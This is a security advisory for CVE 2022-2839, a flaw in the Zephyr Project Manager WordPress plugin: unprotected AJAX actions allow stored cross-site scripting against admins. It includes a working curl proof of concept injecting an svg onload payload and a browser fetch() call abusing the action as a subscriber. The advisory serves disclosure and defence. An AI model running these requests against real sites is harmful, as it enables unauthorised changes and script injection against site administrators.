Zephyr Project Manager < 3.2.55 – Unauthorised AJAX Calls To Stored XSS | CVE 2022-2839

Description

The plugin does not have any authorisation as well as CSRF in all its AJAX actions, allowing unauthenticated users to call them either directly or via CSRF attacks. Furthermore, due to the lack of sanitisation and escaping, it could also allow them to perform Stored Cross-Site Scripting attacks against logged in admins.

The issue was partially fixed in 3.2.5

Proof of Concept

All AJAX actions are affected, below is an example for an unauthenticated Stored XSS by updating a Status

curl -i -s -k -X $'POST' --data-binary $'name="><svg/onload=alert(/XSS/)>&color=%23eeeeee&slug=not_started&type=status&action=zpm_update_status' \
    $'https://example.com/wp-admin/admin-ajax.php'

The XSS will be triggered when an admin will view the Statuses page (/wp-admin/admin.php?page=zephyr_project_manager_categories)


v3.2.5 fixed the CSRF and XSS, however proper auth was still missing, e.g: login as a subscriber and run the below command in the dev console of the web browser

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": 'name=SetBySubscriber&color=%23eeeeee&slug=not_started&type=status&action=zpm_update_status&zpm_nonce=' + zpm_localized['zpm_nonce'],
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));